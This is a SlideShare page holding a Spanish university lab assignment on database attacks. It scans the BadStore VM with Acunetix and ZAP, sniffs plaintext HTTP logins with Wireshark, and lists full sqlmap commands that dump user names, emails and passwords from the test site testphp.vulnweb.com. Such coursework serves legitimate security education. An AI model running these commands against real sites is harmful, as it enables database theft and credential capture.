SlideShare una empresa de Scribd logo
1 de 39
ATAQUES A BASES DE 
DATOS 
Componente Práctico 1 
Arnulfo Fernando Hernández Daza 
Seguridad en bases de datos, Universidad Nacional Abierta y a Distancia-UNAD 
Tauramena, Colombia
1. ATAQUE POR INYECCION DE CODIGO 
SQL BASE DE DATOS BADSTORE 
 Lo primero que hacemos es instalar la base de datos en una máquina virtual; en 
este caso utilizamos VMware.
 Para vulnerar la base de datos de Badstore utilizaremos Acunetix y Zed 
attack proxy. Instalamos y configuramos entonces OWASP Zed.
 Configuro en mi navegador el proxy para enlazar las busquedas del 
navegador con OWAS ZAP:
En la carpeta de instalacion de OWAS ZAP, busco el archivo Config, y en la linea 
del hostname establesco el mismo host que configure en el proxy del navegador: 
127.0.0.1
Descargamos e instalamos Acunetix para poder detectar las vulnerabilidades de 
Badstore.
Procedemos a la configuración de Acunetix: 
Aquí le indico a acunetix la dirección que quiero que escanee en busca de 
vulnerabilidades, es este caso será la dirección de Badstore, 
http://192.168.204.130/.
Y como se puede observar en la imagen siguiente, se comienza el escaneo de las 
vulnerabilidades de Badstore con acunetix:
Mientras se termina el escaneo podemos probar sobre un error hallado, el cross 
site scripting de la siguiente manera:
Ahora volvemos a Zed Attack y habilitamos el escaneo de badstore:
Identificamos una amenaza para atacar:
Aplico un Fuzz a la direccion vulnerable del sitio:
Configuro el Fuzz:
Podemos observar la informacion de algunos clientes:
2. ATAQUE CON INYECCIÓN DE CÓDIGO SQL A 
SITIO WEB http://testphp.vulnweb.com/. 
Procedemos a instalar Python:
Copiamos la carpeta de sqlmap en el disco donde 
está instalado Python
Desde la ventana de símbolo de sistema accedemos a 
la carpeta que contiene los archivos sqlmap y 
ejecutamos el comando para obtener la información 
de la base de datos del sitio de BadStore: 
> color f4 
> cd sqlmap
Para obtener información de la base de datos 
buscamos primero una vulnerabilidad en la página 
digitando el código = al final de la dirección y 
observando el erros en la sintaxis de SQL.
Cuando tenemos la vulnerabilidad entonces digitamos el siguiente código 
para obtener información: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 --dbs
Ahora buscamos informacion en la pagina. Averiguamos que base de datos utiliza 
el sitio: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –current-db
Ahora buscaremos la información correspondiente a las tablas que muestra la 
base de datos: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart – 
tables
Ahora busquemos la informacion de las columnas de las tablas: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns
Ahora podemos averiguar los datos de alguna columna de la tabla users, con el 
siguiente codigo: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C name
Extraemos el contenido: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C name –dump
Averiguamos el correo: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C email –dump
Busquemos la contraseña: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C pass –dump
Ahora el usuario: 
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- 
columns –T users –C uname –dump
Ahora hagamos una prueba con los datos obtenidos del ataque en la pagina y 
verificamos que los datos obtenidos son reales:
3. ATAQUE POR SNIFFING 
 Para el ataque por sniffing utilizaremos el software de Wireshark. 
 Descargamos e instalamos en nuestro equipo el software:
Una vez instalado el software de Wireshark procedemos a configurarlo y 
utilizarlo para nuestro análisis:
 Abrimos el menu Capture, damos clic en opciones y seleccionanos 
nuestra tarjeta de red y le damos iniciar escaneo de red:
 De esta forma se incia el escaneo del trafico en la red:
 Ahora accederemos a una cuenta en un sitio web sin seguridad, de tipo 
http; en este caso utilizaremos una cuenta de www.directoriow.com:
 Una vez logueados en el sitio con nuestros datos procedemos a usar 
Wireshark. Lo primero es dar clic en el botón Expression y escoger la 
opción HTTP – Hypertext transfer protocolo.
 Dentro del menú de opciones damos clic en http.request.method.
 Luego de esto buscamos la ip que destino que corresponde al sitio 
de www.directorio.com, que en este caso es 95.211.231.44.
 Una vez identificada la ip podermos filtrar todo el trafico 
correspondiente a este sitio con el comando ip.addr==95.211.231.44.
 Cuando tengamos filtrado el trafico del sitio, buscamos la línea que contiene el login? del 
usuario que utilizamos y en la ventana inferior en la opción de HTML Form URL Encoded 
podemos encontrar la información de usurario y contraseña que estamos buscando.
REFERENCIAS 
 Recuperado: 
 https://www.youtube.com/watch?v=-C9TEBIfyrg 
 
 Recuperado: 
 http://rootear.com/seguridad/utilizando-sqlma 
 
 Recuperado: 
 https://www.youtube.com/watch?v=OPhqJTBGZsw 
 
 Recuperado: 
 http://www.hacktimes.com/sql_injection_con_sqlmap/

Más contenido relacionado

Destacado

Présentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraitsPrésentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraitsElisabethBDO
 
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )tourtt
 
Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!! Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!! sandyhoyos_19
 
Court circuiter le monde
Court circuiter le mondeCourt circuiter le monde
Court circuiter le mondeouicar
 
Google analytics LAMKIRICH Asma
Google analytics LAMKIRICH AsmaGoogle analytics LAMKIRICH Asma
Google analytics LAMKIRICH AsmaAsy Lach
 
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...Universidad Internacional Menendez Pelayo
 
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano GonzalezInstituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalezpilitacp
 
Nador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personalsNador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personalsmllort2
 
Le luxe en periode de crise
Le luxe en periode de criseLe luxe en periode de crise
Le luxe en periode de criseVictoire LO
 
Christmas show 2014
Christmas show 2014 Christmas show 2014
Christmas show 2014 jbbalan22
 
Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2Yamid Murillo
 
Social media y periodismo
Social media y periodismoSocial media y periodismo
Social media y periodismoonlinesimple
 
Colegio José de Ferro, sedes H, I, J
Colegio José de Ferro, sedes H, I, JColegio José de Ferro, sedes H, I, J
Colegio José de Ferro, sedes H, I, Jpilitacp
 
CR CLUD 08.01.2015
CR CLUD 08.01.2015CR CLUD 08.01.2015
CR CLUD 08.01.2015pquentin
 
Usos Multiples de la animacion
Usos Multiples de la animacionUsos Multiples de la animacion
Usos Multiples de la animacionVeronica Coudannes
 
02 tp asterisk_trunk
02 tp asterisk_trunk02 tp asterisk_trunk
02 tp asterisk_trunkRakoto Zafy
 
Contractualisation op et entreprise privée: cas de l'UCP-Z et FLUDOR au Bénin
Contractualisation op et entreprise privée: cas de l'UCP-Z et FLUDOR au BéninContractualisation op et entreprise privée: cas de l'UCP-Z et FLUDOR au Bénin
Contractualisation op et entreprise privée: cas de l'UCP-Z et FLUDOR au BéninFatimata Kone
 

Destacado (20)

Présentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraitsPrésentation petit déjeuner fev2014 extraits
Présentation petit déjeuner fev2014 extraits
 
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )Sr 253  fit 2- vnn 17 -fer 13 modification (ban chuan )
Sr 253 fit 2- vnn 17 -fer 13 modification (ban chuan )
 
Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!! Joyeux Anniversaire!!!!
Joyeux Anniversaire!!!!
 
Court circuiter le monde
Court circuiter le mondeCourt circuiter le monde
Court circuiter le monde
 
Google analytics LAMKIRICH Asma
Google analytics LAMKIRICH AsmaGoogle analytics LAMKIRICH Asma
Google analytics LAMKIRICH Asma
 
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
Ponencia Afsmi Un Mundo De Servicios en III Foro SSME ( Services Science Mana...
 
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano GonzalezInstituto Politecnico MonseñOr Manuel Sorzano Gonzalez
Instituto Politecnico MonseñOr Manuel Sorzano Gonzalez
 
Verre isolant
Verre isolantVerre isolant
Verre isolant
 
Nador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personalsNador a Vic: Mostra d'itineraris personals
Nador a Vic: Mostra d'itineraris personals
 
CTE PRIMARIA PRIMERA SESION 2014
CTE PRIMARIA PRIMERA SESION 2014CTE PRIMARIA PRIMERA SESION 2014
CTE PRIMARIA PRIMERA SESION 2014
 
Le luxe en periode de crise
Le luxe en periode de criseLe luxe en periode de crise
Le luxe en periode de crise
 
Christmas show 2014
Christmas show 2014 Christmas show 2014
Christmas show 2014
 
Triangle
TriangleTriangle
Triangle
 
Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2Salidad De Monteria Hacia Sahagun 2
Salidad De Monteria Hacia Sahagun 2
 
Social media y periodismo
Social media y periodismoSocial media y periodismo
Social media y periodismo
 
Colegio José de Ferro, sedes H, I, J
Colegio José de Ferro, sedes H, I, JColegio José de Ferro, sedes H, I, J
Colegio José de Ferro, sedes H, I, J
 
CR CLUD 08.01.2015
CR CLUD 08.01.2015CR CLUD 08.01.2015
CR CLUD 08.01.2015
 
Usos Multiples de la animacion
Usos Multiples de la animacionUsos Multiples de la animacion
Usos Multiples de la animacion
 
02 tp asterisk_trunk
02 tp asterisk_trunk02 tp asterisk_trunk
02 tp asterisk_trunk
 
Contractualisation op et entreprise privée: cas de l'UCP-Z et FLUDOR au Bénin
Contractualisation op et entreprise privée: cas de l'UCP-Z et FLUDOR au BéninContractualisation op et entreprise privée: cas de l'UCP-Z et FLUDOR au Bénin
Contractualisation op et entreprise privée: cas de l'UCP-Z et FLUDOR au Bénin
 

Similar a Bases de datos ataques SQL inyección sniffing

Similar a Bases de datos ataques SQL inyección sniffing (20)

Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
Team.docx
Team.docxTeam.docx
Team.docx
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datos
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql web
 
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Present3
Present3Present3
Present3
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodri
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio web
 
Hacking ético [Pentest]
Hacking ético [Pentest]Hacking ético [Pentest]
Hacking ético [Pentest]
 
VULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONVULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATION
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitation
 
Labs
LabsLabs
Labs
 
Taller
TallerTaller
Taller
 
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
 
Internal.docx
Internal.docxInternal.docx
Internal.docx
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Manual de instalacion de un servidor proxy
Manual de instalacion de un servidor proxyManual de instalacion de un servidor proxy
Manual de instalacion de un servidor proxy
 

Último

Comite Operativo Ciberseguridad 012020.pptx
Comite Operativo Ciberseguridad 012020.pptxComite Operativo Ciberseguridad 012020.pptx
Comite Operativo Ciberseguridad 012020.pptxClaudiaPerez86192
 
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kVEl proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kVSebastianPaez47
 
sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7luisanthonycarrascos
 
hitos del desarrollo psicomotor en niños.docx
hitos del desarrollo psicomotor en niños.docxhitos del desarrollo psicomotor en niños.docx
hitos del desarrollo psicomotor en niños.docxMarcelaArancibiaRojo
 
Seleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusiblesSeleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusiblesSaulSantiago25
 
ECONOMIA APLICADA SEMANA 555555555544.pdf
ECONOMIA APLICADA SEMANA 555555555544.pdfECONOMIA APLICADA SEMANA 555555555544.pdf
ECONOMIA APLICADA SEMANA 555555555544.pdfmatepura
 
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONALCHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONALKATHIAMILAGRITOSSANC
 
ECONOMIA APLICADA SEMANA 555555555555555555.pdf
ECONOMIA APLICADA SEMANA 555555555555555555.pdfECONOMIA APLICADA SEMANA 555555555555555555.pdf
ECONOMIA APLICADA SEMANA 555555555555555555.pdffredyflores58
 
Magnetismo y electromagnetismo principios
Magnetismo y electromagnetismo principiosMagnetismo y electromagnetismo principios
Magnetismo y electromagnetismo principiosMarceloQuisbert6
 
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdfCristhianZetaNima
 
Obras paralizadas en el sector construcción
Obras paralizadas en el sector construcciónObras paralizadas en el sector construcción
Obras paralizadas en el sector construcciónXimenaFallaLecca1
 
Sesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
Sesión 02 TIPOS DE VALORIZACIONES CURSO CersaSesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
Sesión 02 TIPOS DE VALORIZACIONES CURSO CersaXimenaFallaLecca1
 
Ingeniería de Tránsito. Proyecto Geométrico de calles y carreteras, es el pro...
Ingeniería de Tránsito. Proyecto Geométrico de calles y carreteras, es el pro...Ingeniería de Tránsito. Proyecto Geométrico de calles y carreteras, es el pro...
Ingeniería de Tránsito. Proyecto Geométrico de calles y carreteras, es el pro...wvernetlopez
 
Curso intensivo de soldadura electrónica en pdf
Curso intensivo de soldadura electrónica  en pdfCurso intensivo de soldadura electrónica  en pdf
Curso intensivo de soldadura electrónica en pdfFernandaGarca788912
 
2. UPN PPT - SEMANA 02 GESTION DE PROYECTOS MG CHERYL QUEZADA(1).pdf
2. UPN PPT - SEMANA 02 GESTION DE PROYECTOS MG CHERYL QUEZADA(1).pdf2. UPN PPT - SEMANA 02 GESTION DE PROYECTOS MG CHERYL QUEZADA(1).pdf
2. UPN PPT - SEMANA 02 GESTION DE PROYECTOS MG CHERYL QUEZADA(1).pdfAnthonyTiclia
 
Una estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NISTUna estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NISTFundación YOD YOD
 
Introducción a los sistemas neumaticos.ppt
Introducción a los sistemas neumaticos.pptIntroducción a los sistemas neumaticos.ppt
Introducción a los sistemas neumaticos.pptEduardoCorado
 
Curso Análisis Fisicoquímico y Microbiológico de Aguas -EAI - SESIÓN 5.pdf
Curso Análisis Fisicoquímico y Microbiológico de Aguas -EAI - SESIÓN 5.pdfCurso Análisis Fisicoquímico y Microbiológico de Aguas -EAI - SESIÓN 5.pdf
Curso Análisis Fisicoquímico y Microbiológico de Aguas -EAI - SESIÓN 5.pdfcesar17lavictoria
 
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdf
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdfReporte de simulación de flujo del agua en un volumen de control MNVA.pdf
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdfMikkaelNicolae
 

Último (20)

Comite Operativo Ciberseguridad 012020.pptx
Comite Operativo Ciberseguridad 012020.pptxComite Operativo Ciberseguridad 012020.pptx
Comite Operativo Ciberseguridad 012020.pptx
 
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kVEl proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
 
sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7
 
hitos del desarrollo psicomotor en niños.docx
hitos del desarrollo psicomotor en niños.docxhitos del desarrollo psicomotor en niños.docx
hitos del desarrollo psicomotor en niños.docx
 
Seleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusiblesSeleccion de Fusibles en media tension fusibles
Seleccion de Fusibles en media tension fusibles
 
ECONOMIA APLICADA SEMANA 555555555544.pdf
ECONOMIA APLICADA SEMANA 555555555544.pdfECONOMIA APLICADA SEMANA 555555555544.pdf
ECONOMIA APLICADA SEMANA 555555555544.pdf
 
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONALCHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
CHARLA DE INDUCCIÓN SEGURIDAD Y SALUD OCUPACIONAL
 
ECONOMIA APLICADA SEMANA 555555555555555555.pdf
ECONOMIA APLICADA SEMANA 555555555555555555.pdfECONOMIA APLICADA SEMANA 555555555555555555.pdf
ECONOMIA APLICADA SEMANA 555555555555555555.pdf
 
Magnetismo y electromagnetismo principios
Magnetismo y electromagnetismo principiosMagnetismo y electromagnetismo principios
Magnetismo y electromagnetismo principios
 
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
04. Sistema de fuerzas equivalentes II - UCV 2024 II.pdf
 
Obras paralizadas en el sector construcción
Obras paralizadas en el sector construcciónObras paralizadas en el sector construcción
Obras paralizadas en el sector construcción
 
VALORIZACION Y LIQUIDACION MIGUEL SALINAS.pdf
VALORIZACION Y LIQUIDACION MIGUEL SALINAS.pdfVALORIZACION Y LIQUIDACION MIGUEL SALINAS.pdf
VALORIZACION Y LIQUIDACION MIGUEL SALINAS.pdf
 
Sesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
Sesión 02 TIPOS DE VALORIZACIONES CURSO CersaSesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
Sesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
 
Ingeniería de Tránsito. Proyecto Geométrico de calles y carreteras, es el pro...
Ingeniería de Tránsito. Proyecto Geométrico de calles y carreteras, es el pro...Ingeniería de Tránsito. Proyecto Geométrico de calles y carreteras, es el pro...
Ingeniería de Tránsito. Proyecto Geométrico de calles y carreteras, es el pro...
 
Curso intensivo de soldadura electrónica en pdf
Curso intensivo de soldadura electrónica  en pdfCurso intensivo de soldadura electrónica  en pdf
Curso intensivo de soldadura electrónica en pdf
 
2. UPN PPT - SEMANA 02 GESTION DE PROYECTOS MG CHERYL QUEZADA(1).pdf
2. UPN PPT - SEMANA 02 GESTION DE PROYECTOS MG CHERYL QUEZADA(1).pdf2. UPN PPT - SEMANA 02 GESTION DE PROYECTOS MG CHERYL QUEZADA(1).pdf
2. UPN PPT - SEMANA 02 GESTION DE PROYECTOS MG CHERYL QUEZADA(1).pdf
 
Una estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NISTUna estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NIST
 
Introducción a los sistemas neumaticos.ppt
Introducción a los sistemas neumaticos.pptIntroducción a los sistemas neumaticos.ppt
Introducción a los sistemas neumaticos.ppt
 
Curso Análisis Fisicoquímico y Microbiológico de Aguas -EAI - SESIÓN 5.pdf
Curso Análisis Fisicoquímico y Microbiológico de Aguas -EAI - SESIÓN 5.pdfCurso Análisis Fisicoquímico y Microbiológico de Aguas -EAI - SESIÓN 5.pdf
Curso Análisis Fisicoquímico y Microbiológico de Aguas -EAI - SESIÓN 5.pdf
 
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdf
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdfReporte de simulación de flujo del agua en un volumen de control MNVA.pdf
Reporte de simulación de flujo del agua en un volumen de control MNVA.pdf
 

Bases de datos ataques SQL inyección sniffing

  • 1. ATAQUES A BASES DE DATOS Componente Práctico 1 Arnulfo Fernando Hernández Daza Seguridad en bases de datos, Universidad Nacional Abierta y a Distancia-UNAD Tauramena, Colombia
  • 2. 1. ATAQUE POR INYECCION DE CODIGO SQL BASE DE DATOS BADSTORE  Lo primero que hacemos es instalar la base de datos en una máquina virtual; en este caso utilizamos VMware.
  • 3.  Para vulnerar la base de datos de Badstore utilizaremos Acunetix y Zed attack proxy. Instalamos y configuramos entonces OWASP Zed.
  • 4.  Configuro en mi navegador el proxy para enlazar las busquedas del navegador con OWAS ZAP:
  • 5. En la carpeta de instalacion de OWAS ZAP, busco el archivo Config, y en la linea del hostname establesco el mismo host que configure en el proxy del navegador: 127.0.0.1
  • 6. Descargamos e instalamos Acunetix para poder detectar las vulnerabilidades de Badstore.
  • 7. Procedemos a la configuración de Acunetix: Aquí le indico a acunetix la dirección que quiero que escanee en busca de vulnerabilidades, es este caso será la dirección de Badstore, http://192.168.204.130/.
  • 8. Y como se puede observar en la imagen siguiente, se comienza el escaneo de las vulnerabilidades de Badstore con acunetix:
  • 9. Mientras se termina el escaneo podemos probar sobre un error hallado, el cross site scripting de la siguiente manera:
  • 10. Ahora volvemos a Zed Attack y habilitamos el escaneo de badstore:
  • 12. Aplico un Fuzz a la direccion vulnerable del sitio:
  • 14. Podemos observar la informacion de algunos clientes:
  • 15. 2. ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB http://testphp.vulnweb.com/. Procedemos a instalar Python:
  • 16. Copiamos la carpeta de sqlmap en el disco donde está instalado Python
  • 17. Desde la ventana de símbolo de sistema accedemos a la carpeta que contiene los archivos sqlmap y ejecutamos el comando para obtener la información de la base de datos del sitio de BadStore: > color f4 > cd sqlmap
  • 18. Para obtener información de la base de datos buscamos primero una vulnerabilidad en la página digitando el código = al final de la dirección y observando el erros en la sintaxis de SQL.
  • 19. Cuando tenemos la vulnerabilidad entonces digitamos el siguiente código para obtener información: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 --dbs
  • 20. Ahora buscamos informacion en la pagina. Averiguamos que base de datos utiliza el sitio: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –current-db
  • 21. Ahora buscaremos la información correspondiente a las tablas que muestra la base de datos: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart – tables
  • 22. Ahora busquemos la informacion de las columnas de las tablas: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns
  • 23. Ahora podemos averiguar los datos de alguna columna de la tabla users, con el siguiente codigo: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C name
  • 24. Extraemos el contenido: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C name –dump
  • 25. Averiguamos el correo: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C email –dump
  • 26. Busquemos la contraseña: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C pass –dump
  • 27. Ahora el usuario: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C uname –dump
  • 28. Ahora hagamos una prueba con los datos obtenidos del ataque en la pagina y verificamos que los datos obtenidos son reales:
  • 29. 3. ATAQUE POR SNIFFING  Para el ataque por sniffing utilizaremos el software de Wireshark.  Descargamos e instalamos en nuestro equipo el software:
  • 30. Una vez instalado el software de Wireshark procedemos a configurarlo y utilizarlo para nuestro análisis:
  • 31.  Abrimos el menu Capture, damos clic en opciones y seleccionanos nuestra tarjeta de red y le damos iniciar escaneo de red:
  • 32.  De esta forma se incia el escaneo del trafico en la red:
  • 33.  Ahora accederemos a una cuenta en un sitio web sin seguridad, de tipo http; en este caso utilizaremos una cuenta de www.directoriow.com:
  • 34.  Una vez logueados en el sitio con nuestros datos procedemos a usar Wireshark. Lo primero es dar clic en el botón Expression y escoger la opción HTTP – Hypertext transfer protocolo.
  • 35.  Dentro del menú de opciones damos clic en http.request.method.
  • 36.  Luego de esto buscamos la ip que destino que corresponde al sitio de www.directorio.com, que en este caso es 95.211.231.44.
  • 37.  Una vez identificada la ip podermos filtrar todo el trafico correspondiente a este sitio con el comando ip.addr==95.211.231.44.
  • 38.  Cuando tengamos filtrado el trafico del sitio, buscamos la línea que contiene el login? del usuario que utilizamos y en la ventana inferior en la opción de HTML Form URL Encoded podemos encontrar la información de usurario y contraseña que estamos buscando.
  • 39. REFERENCIAS  Recuperado:  https://www.youtube.com/watch?v=-C9TEBIfyrg   Recuperado:  http://rootear.com/seguridad/utilizando-sqlma   Recuperado:  https://www.youtube.com/watch?v=OPhqJTBGZsw   Recuperado:  http://www.hacktimes.com/sql_injection_con_sqlmap/